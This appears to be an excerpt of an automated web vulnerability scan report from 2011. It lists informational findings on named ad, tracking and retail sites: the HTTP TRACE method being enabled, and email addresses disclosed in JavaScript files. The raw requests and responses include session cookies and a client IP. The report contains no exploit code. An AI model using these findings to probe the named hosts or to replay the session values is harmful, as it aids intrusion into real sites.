HTTP/1.1 200 OK Server: Footprint 4.6/FPMCP Mime-Version: 1.0 Date: Mon, 16 May 2011 01:19:46 GMT Content-Type: message/http Content-Length: 253 Expires: Mon, 16 May 2011 01:19:46 GMT Connection: close TRACE / HTTP/1.0 Host: ads.pubmatic.com Cookie: 7f1f0508d037feb0; PUBMDCID=2; KADUSERCOOKIE=AFFBE250 _FP_X_URL: http://ads.pubmatic.com/ |
Severity: | Information |
Confidence: | Certain |
Host: | http://bh.contextweb.com |
Path: | / |
TRACE / HTTP/1.0 Host: bh.contextweb.com Cookie: a98aafc5667f8040 |
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 Content-Type: message/http Content-Length: 237 Date: Mon, 16 May 2011 01:19:50 GMT Connection: Keep-Alive TRACE / HTTP/1.0 host: bh.contextweb.com cookie: a98aafc5667f8040; V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14 connection: Keep-Alive cw-userhostaddress: 173.193.214.243 |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.xp1.ru4.com |
Path: | / |
TRACE / HTTP/1.0 Host: d.xp1.ru4.com Cookie: c9b9f53ae1c05ac9 |
HTTP/1.1 200 OK Server: Sun-Java-System-Web Date: Mon, 16 May 2011 01:19:57 GMT P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI" Content-type: message/http Connection: close TRACE / HTTP/1.0 Host: d.xp1.ru4.com Cookie: c9b9f53ae1c05ac9; X1ID=AG-00000001389358554 |
Severity: | Information |
Confidence: | Certain |
Host: | http://image2.pubmatic |
Path: | / |
TRACE / HTTP/1.0 Host: image2.pubmatic.com Cookie: eae6eb792bf1132a |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:51 GMT Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2 Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: image2.pubmatic.com Cookie: eae6eb792bf1132a; PUBMDCID=2; KADUSERCOOKIE=AFFBE250 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://imawow.weather.com |
Path: | / |
TRACE / HTTP/1.0 Host: imawow.weather.com Cookie: 6164854f224ea7a7 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:59 GMT Server: Apache Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: imawow.weather.com Cookie: 6164854f224ea7a7 Connection: Keep-Alive OAS_IP: 173.193.214.243 |
Severity: | Information |
Confidence: | Certain |
Host: | http://login.dotomi.com |
Path: | / |
TRACE / HTTP/1.0 Host: login.dotomi.com Cookie: 5edd645f7d0463e1 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:38:30 GMT Server: Apache Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: login.dotomi.com Cookie: 5edd645f7d0463e1; Apache=173.193.214.243 |
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | / |
TRACE / HTTP/1.0 Host: optimized-by.rubicon Cookie: f7f92c4d4640034e |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:21:48 GMT Server: RAS/1.3 (Unix) Connection: close Content-Type: message/http TRACE / HTTP/1.0 Cookie: f7f92c4d4640034e; put_2146=xn7ja41kw4n ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.rubicon |
Path: | / |
TRACE / HTTP/1.0 Host: pixel.rubiconproject.com Cookie: e67d9fef3e7503b4 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:54 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: pixel.rubiconproject.com Cookie: e67d9fef3e7503b4; rpx=5671%3D11993%2C0%2C1 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://r.openx.net |
Path: | / |
TRACE / HTTP/1.0 Host: r.openx.net Cookie: 89e45e552dcf487 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:26:09 GMT Server: Apache Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: r.openx.net Cookie: 89e45e552dcf487; i=5cb31120-2bcf-44f1-b2a9 X-Forwarded-For: 173.193.214.243 |
Severity: | Information |
Confidence: | Certain |
Host: | http://secure-us |
Path: | / |
TRACE / HTTP/1.0 Host: secure-us.imrworldwide Cookie: 27418d398c333c08 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:30:58 GMT Server: Apache Connection: close Content-Type: message/http TRACE / HTTP/1.0 Cookie: 27418d398c333c08; V5=AStfNgoZEVhWEhozM Host: secure-us.imrworldwide |
Severity: | Information |
Confidence: | Certain |
Host: | http://track.pubmatic.com |
Path: | / |
TRACE / HTTP/1.0 Host: track.pubmatic.com Cookie: 6ab64eda211982f4 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:23:17 GMT Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2 Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: track.pubmatic.com Cookie: 6ab64eda211982f4; PUBMDCID=2; KADUSERCOOKIE=AFFBE250 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://travel.travelocity |
Path: | / |
TRACE / HTTP/1.0 Host: travel.travelocity.com Cookie: a51706f770142415 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:30:05 GMT Server: Apache Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: travel.travelocity.com Cookie: a51706f770142415; JSESSIONID=C814B875E ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ts.istrack.com |
Path: | / |
TRACE / HTTP/1.0 Host: ts.istrack.com Cookie: 8cfa5232c4b6df0f |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:33:22 GMT Server: Apache Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: ts.istrack.com Cookie: 8cfa5232c4b6df0f |
Severity: | Information |
Confidence: | Certain |
Host: | http://webassets.scea.com |
Path: | / |
TRACE / HTTP/1.0 Host: webassets.scea.com Cookie: ddd89a3c40063b |
HTTP/1.1 200 OK Server: Footprint 4.6/FPMCP Mime-Version: 1.0 Date: Sun, 15 May 2011 20:27:00 GMT Content-Type: message/http Content-Length: 109 Expires: Sun, 15 May 2011 20:27:00 GMT Connection: close TRACE / HTTP/1.0 Host: webassets.scea.com Cookie: ddd89a3c40063b _FP_X_URL: http://webassets.scea.com |
Severity: | Information |
Confidence: | Certain |
Host: | http://widgets.outbrain |
Path: | / |
TRACE / HTTP/1.0 Host: widgets.outbrain.com Cookie: 743127004332b5f6 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:20:45 GMT Server: Apache Content-Type: message/http Accept-Ranges: bytes Connection: close TRACE / HTTP/1.1 Cookie: 743127004332b5f6; obuid=8212382c-a920-4555 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://wow.weather.com |
Path: | / |
TRACE / HTTP/1.0 Host: wow.weather.com Cookie: 12e0f92996559dc5 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:52 GMT Server: Apache Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: wow.weather.com Cookie: 12e0f92996559dc5 Connection: Keep-Alive OAS_IP: 173.193.214.243 |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.magicalki |
Path: | / |
TRACE / HTTP/1.0 Host: www.magicalkingdoms.com Cookie: a4616a8c9f74b1a6 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:53 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14 Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: www.magicalkingdoms.com Cookie: a4616a8c9f74b1a6; PHPSESSID=cf6190390f |
Severity: | Information |
Confidence: | Certain |
Host: | http://blog.us.plays |
Path: | /wp-content/themes |
GET /wp-content/themes Host: blog.us.playstation.com Proxy-Connection: keep-alive Referer: http://blog.us.plays User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mbox=check#true |
HTTP/1.1 200 OK Server: nginx Date: Sun, 15 May 2011 20:26:40 GMT Content-Type: application/x-javascript; charset=utf-8 Last-Modified: Mon, 14 Mar 2011 15:03:57 GMT nnCoection: close Expires: Thu, 16 Jun 2011 20:26:40 GMT Cache-Control: max-age=2764800 Cache-Control: private Vary: Accept-Encoding Content-Length: 9259 /* * Facebox (for jQuery) * version: 1.2 (05/05/2008) * @requires jQuery v1.2 or later * * Examples at http://famspam.com * * Licensed under the MIT: * http://www.opensource.org * * Copyright 2007, 2008 Chris Wanstrath [ chris@ozmm.org ] * * Usage: * * jQuery(document).ready * jQuery('a[rel*=facebox]') * }) * * <a href="#terms" rel="facebox"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://disneycruise |
Path: | /reservations/customize |
GET /reservations/customize Host: disneycruise.disney.go Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=854018943 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html Vary: Accept-Encoding Date: Mon, 16 May 2011 01:29:41 GMT Set-Cookie: DCL_POOL=1;path=/; Set-Cookie: dcl_i_persistence=H Content-Length: 63930 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <label for="loginEmailAddress" ...[SNIP]... <label for="loginEmailAddress" ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://i.usatoday.net |
Path: | /_common/_scripts/jquery |
GET /_common/_scripts/jquery Host: i.usatoday.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Mon, 10 May 2010 13:01:50 GMT Accept-Ranges: bytes ETag: "0b341f440f0ca1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Content-Length: 3654 Date: Mon, 16 May 2011 01:19:44 GMT Connection: close Vary: Accept-Encoding /*jslint browser: true */ /*global jQuery: true */ /** * jQuery Cookie plugin * * Copyright (c) 2010 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opens ...[SNIP]... kie will be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ /** * Get the value of a cookie with the given key. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String key The key of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function (key, value, options) { // key and value given, set cookie... if (arguments.length > ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://i.usatoday.net |
Path: | /asp/uas3/uas.jquery |
GET /asp/uas3/uas.jquery Host: i.usatoday.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Wed, 06 Apr 2011 17:55:03 GMT Accept-Ranges: bytes ETag: "3d4f53c183f4cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Content-Length: 20271 Date: Mon, 16 May 2011 01:20:33 GMT Connection: close Vary: Accept-Encoding // ColorBox v1.3.9 - a full featured, light-weight, customizable lightbox based on jQuery 1.3 // c) 2009 Jack Moore - www.colorpowered.com - jack@colorpowered.com // Licensed under the MIT license: http://www.opensource.org (function($,window){var defaults={transition: ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | / |
GET / HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Set-Cookie: user=id=1305509541690-1 Content-Type: text/html; charset=utf-8 Content-Length: 42652 Date: Mon, 16 May 2011 01:39:49 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>McAfee Secure Shopping - Secure Online Shopping</title> <meta name="d ...[SNIP]... <a target=_top class=footer1 href="mailto:secureshopping@mcafee.com"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://shop.pacsun.com |
Path: | /js_external/PS_external |
GET /js_external/PS_external Host: shop.pacsun.com Proxy-Connection: keep-alive Referer: http://shop.pacsun.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=4A5CD2AB1 |
HTTP/1.1 200 OK Server: Apache Last-Modified: Tue, 10 May 2011 18:15:03 GMT Accept-Ranges: bytes Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 39093 Cache-Control: max-age=3600 Date: Mon, 16 May 2011 01:43:43 GMT Connection: close /***** Email validation *****/ $.extend({ getUrlVars: function(){ var vars = [], hash; var hashes = window.location.href for(va ...[SNIP]... l(displayDate()); $("#subscribeForm") rules:{ email:{ email: true }, email2:{ required:function(element return $('#subscribeForm').find( email: true }, zip:{ required:function(element return $('#subscribeForm').find( digits:true, minlength:5, digits:true }, BIRTHMM:{ required:function(element return $('#subscribeForm').find( minlength:2, digits:true }, BIRTHDD:{ required:function(element return $('#subscribeForm').find( minlength:2, digits:true }, BIRTHCCYY:{ required:function(element return $('#subscribeForm').find( minlength:4, digits:true }, gender:{ required:function(element return $('#subscribeForm').find( }, mobile:{ minlength:10, maxlength:14 } }, highlight: function(element, errorClass, validClass) { if( ...[SNIP]... ); } ); } /***** EOF Email Validation *****/ /***** Footer form interaction *****/ function formInputs(input){ var y = input.name; var x = input.value; switch(y){ case "email": if (x == "yourname@gmail.com"){input.value = "";input.className = "blackInput";} break; case "postalcode": if (x == "Zip Code"){input.value = "";input.className = "blackInput";} break; } }; function formInputsOut(input){ var y = input.name; var x = input.value; switch(y){ case "email": if (x == ""){input.value = "yourname@gmail.com";input.className = "greyInput";} break; case "postalcode": if (x == ""){input.value = "Zip Code";input.className = "greyInput";} break; } }; /***** EOF Footer form interaction *****/ |
Severity: | Information |
Confidence: | Certain |
Host: | http://shoprunner.force |
Path: | /content/JsContentEl |
GET /content/JsContentEl Host: shoprunner.force.com Proxy-Connection: keep-alive Referer: http://www.gnc.com/home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: X-Powered-By: Salesforce.com ApexPages P3P: CP="CUR OTR STA" Last-Modified: Mon, 16 May 2011 01:05:43 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Content-Length: 108383 Cache-Control: public, max-age=19338 Expires: Mon, 16 May 2011 07:05:34 GMT Date: Mon, 16 May 2011 01:43:16 GMT Connection: close function sr_run(){ return false } /* ------------------------- * Global Variables ------------------------- //the shoprunner object var sr_$={}; sr_$.contents={} ...[SNIP]... <a href="mailto:MemberServices@ShopRunner ...[SNIP]... <a href="mailto:MemberServices@ShopRunner ...[SNIP]... <a href="mailto:MemberServices@ShopRunner ...[SNIP]... <a href="mailto:MemberServices@ShopRunner ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://shoprunner.force |
Path: | /content/JsContentEl |
GET /content/JsContentEl Host: shoprunner.force.com Proxy-Connection: keep-alive Referer: http://www.petsmart.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: X-Powered-By: Salesforce.com ApexPages P3P: CP="CUR OTR STA" Last-Modified: Mon, 16 May 2011 01:05:40 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Content-Length: 106125 Cache-Control: public, max-age=19577 Expires: Mon, 16 May 2011 07:05:43 GMT Date: Mon, 16 May 2011 01:39:26 GMT Connection: close function sr_run(){ return false } /* ------------------------- * Global Variables ------------------------- //the shoprunner object var sr_$={}; sr_$.contents={} ...[SNIP]... <a href="mailto:MemberServices@ShopRunner ...[SNIP]... <a href="mailto:MemberServices@ShopRunner ...[SNIP]... <a href="mailto:MemberServices@ShopRunner ...[SNIP]... <a href="mailto:MemberServices@ShopRunner ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://static.bhphot |
Path: | /FrameWork/js/common.js |
GET /FrameWork/js/common.js?v Host: static.bhphotovideo.com Proxy-Connection: keep-alive Referer: http://www.bhphotovideo User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=0pnRNQQMwR! |
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Mon, 09 May 2011 03:00:18 GMT Content-Length: 6834 ETag: "1ab2-4dc758c2" Accept-Ranges: bytes Vary: Accept-Encoding Cache-Control: public, max-age=7200 Date: Mon, 16 May 2011 01:44:01 GMT Connection: close /* ************************* Copyright (c) 2008, B & H Foto & Electronics Corp. All rights reserved. http://wwww.bhphotovideo ************************* /** * jQuery-Plugin "Placeholder" * * @version: 1.1.0, 01.19.2011 * * @author: Andres Vidal * code@andresvidal.com * http://www.andresvidal * * Instructions: Call $(selector).placeholder * @example: $('input#search') ...[SNIP]... idget with Profile Support. * This widget extends the default functionality of window.open() with the use of powerful profiles. * * @version: 1.0.0, 08.04.2010 * @author: Andres Vidal * code@andresvidal.com * http://www.andresvidal * * @arg url(mixed) The popup url or object containing an href. Example: Use object [this] or string 'http://www.google.com' * @arg name(stri ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://static.bhphot |
Path: | /FrameWork/js/jquery |
GET /FrameWork/js/jquery Host: static.bhphotovideo.com Proxy-Connection: keep-alive Referer: http://www.bhphotovideo User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=0pnRNQQMwR! |
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Mon, 19 Apr 2010 03:00:13 GMT ETag: "f26-4bcbc73d" Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 3878 Cache-Control: public, max-age=7200 Date: Mon, 16 May 2011 01:39:03 GMT Connection: close /** * Styled Dropdown - jQuery Plugin v0.1.0 * Easily converts SELECT elements to eventful and styleable DL, DT, DD elements. * Requires jQuery 1.3.x * * Copyright 2010, Andres Vidal (code@andresvidal.com) * Dual licensed under the MIT or GPL Version 2 licenses. * http://www.andresvidal * * Instructions: Call $(selector).styledDr ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://widgets.outbrain |
Path: | /OutbrainRater.js |
GET /OutbrainRater.js HTTP/1.1 Host: widgets.outbrain.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: obuid=8212382c-a920-4555 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:48 GMT Server: Apache Last-Modified: Sun, 08 May 2011 14:26:01 GMT ETag: "100029-2302d-4a2c48 Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 143405 Content-Type: application/x-javascript Cache-Control: private, max-age=604800 Age: 0 Expires: Mon, 23 May 2011 01:19:48 GMT Connection: Keep-Alive window.OB_releaseVer= ...[SNIP]... <a href='mailto:feedback@outbrain.com'>feedback@outbrain.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.acehardware |
Path: | /js/LIB_core.js |
GET /js/LIB_core.js HTTP/1.1 Host: www.acehardware.com Proxy-Connection: keep-alive Referer: http://www.acehardware User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=vLQsNQBSZ |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:42:46 GMT Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 04 May 2011 08:47:00 GMT ETag: "511655-a9a7-4a26f4c Accept-Ranges: bytes Cache-Control: max-age=21600 Expires: Mon, 16 May 2011 07:42:46 GMT Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Content-Length: 43431 Connection: close Content-Type: application/x-javascript /* Prototype JavaScript framework, version 1.4.0 * (c) 2005 Sam Stephenson <sam@conio.net> * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cruisecritic |
Path: | /js/global.js |
GET /js/global.js?cb=324c14 HTTP/1.1 Host: www.cruisecritic.com Proxy-Connection: keep-alive Referer: http://www.cruisecritic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SUBSCRIBENEWSLETTER=1 |
HTTP/1.1 200 OK Cache-Control: max-age=31536000 Content-Length: 26129 Content-Type: application/x-javascript Content-Location: http://www.cruisecritic Last-Modified: Fri, 06 May 2011 18:36:07 GMT Accept-Ranges: bytes Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:29:54 GMT function obj(name) { return document.getElementById } function isDefined(variable) { if(typeof(variable) !== 'undefined' && variable !== null) return true; return false; } ...[SNIP]... n van Zonneveld', 'van'); // * returns 1: 'van Zonneveld' // * example 2: strstr('Kevin van Zonneveld', 'van', true); // * returns 2: 'Kevin ' // * example 3: strstr('name@example.com', '@'); // * returns 3: '@example.com' // * example 4: strstr('name@example.com', '@', true); // * returns 4: 'name' var pos = 0; haystack += ''; pos = haystack.indexOf(needle); if (pos == -1) { return false; } else { if (bool) { ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.fingerhut.com |
Path: | /js/jquery.cookie.js |
GET /js/jquery.cookie.js HTTP/1.1 Host: www.fingerhut.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Last-Modified: Wed, 11 May 2011 13:33:50 GMT Accept-Ranges: bytes Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 4246 Cache-Control: max-age=1490 Expires: Mon, 16 May 2011 01:51:40 GMT Date: Mon, 16 May 2011 01:26:50 GMT Connection: close /** * Cookie plugin * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org * http://www.gnu.org/li ...[SNIP]... kie will be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ /** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) { ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.fingerhut.com |
Path: | /js/jquery.cookie.js |
GET /js/jquery.cookie.js HTTP/1.1 Host: www.fingerhut.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Last-Modified: Wed, 11 May 2011 13:33:50 GMT Accept-Ranges: bytes Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 4246 Expires: Mon, 16 May 2011 01:31:23 GMT Date: Mon, 16 May 2011 01:31:23 GMT Connection: keep-alive /** * Cookie plugin * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org * http://www.gnu.org/li ...[SNIP]... kie will be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ /** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) { ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.guitarcenter |
Path: | /Includes/GuitarCenter |
GET /Includes/GuitarCenter Host: www.guitarcenter.com Proxy-Connection: keep-alive Referer: http://www.guitarcenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Content-Length: 69210 Content-Type: application/x-javascript Last-Modified: Wed, 27 Apr 2011 11:51:54 GMT Accept-Ranges: bytes Vary: Accept-Encoding Server: Microsoft-IIS/6.0 SN: 28 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:40:16 GMT function getCookie(name){var arg=name+"=";var alen=arg.length;var clen=document.cookie ...[SNIP]... )`2'';@w=s.vs(sed)`5trk`F ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.guitarcenter |
Path: | /Includes/Guitarcenter |
